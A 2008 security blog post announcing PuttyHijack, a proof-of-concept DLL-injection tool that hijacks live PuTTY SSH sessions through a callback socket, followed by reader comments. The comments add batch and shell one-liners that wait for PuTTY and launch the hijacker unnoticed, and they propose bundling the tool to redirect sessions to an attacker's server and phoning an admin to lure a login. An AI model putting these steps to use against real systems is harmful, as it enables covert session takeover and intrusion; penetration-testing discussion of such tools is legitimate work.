Monday, August 4, 2008

Putty Hijack released by Insomnia Security

Brett Moore of Insomnia Security has released Putty Hijack


From the announcement:

PuttyHijack is a POC tool that injects a dll into the Putty

process to hijack an existing, or soon to be created, connection.

This can be useful during penetration tests when a windows box that
has been compromised is used to SSH/Telnet into other servers.

The injected DLL installs some hooks and creates a socket for a
callback connection that is then used for input/output redirection.

It does not kill the current connection, and will cleanly uninject
if the socket or process is stopped.

Works as described.

* only works if putty is already running, otherwise it has nothing to hook. So in its current state its cute but not usable.

*what would be handy would be for the tool to run and wait for putty to start then do the hooking.
*low tech solution of just replacing the putty link with a bat file calling both putty.exe and puttyhijack thus far is not working :-(
*source is included so realistically i should shut up and just fire up visual studio

Screen shots



Anonymous said...

I'm sure a short shell script would work to check the status of PuTTY and wait for it to be launched. That way you wouldn't alert the user/victim by kicking off a PuTTY session witout them asking. You can just run the script, sit back and wait ;)

Something like this maybe .:

res="$(ps -ea | grep -i putty | grep -v grep | wc -l)" && while [ $result -eq 0 ]; do echo "PuTTY not running. Waiting 10 seconds before recheck"; sleep 10; done; PuttyHijack 2222

Quick and dirty I know... but could be interesting.

CG said...

good idea but its windows only.

Anonymous said...

Yeah I realized this after I clicked to post the comment. Sometimes lack of sleep can make you do crazy things. Maybe this one might be more the ticket .:

FOR /L %i in (1,0,2) do @wmic process list brief | findstr "putty.exe" && c:\pathto\PuttyHijack 2222 && exit

Morgan Storey said...

Couldn't you have a 7zip executeable that is set to extract putty.exe rocess.exe, the dll and puttyhijack.exe, then run putty, process.exe (to get the pid) then call puttyhijack with the pid past through and a redirect to the attackers server.

CG said...

perhaps, but then you'd have to wait for the admin to log into the already existing putty instance. They may be suspicious of that.

Of course doing that then calling them about a problem that they might ssh into the router/server to fix....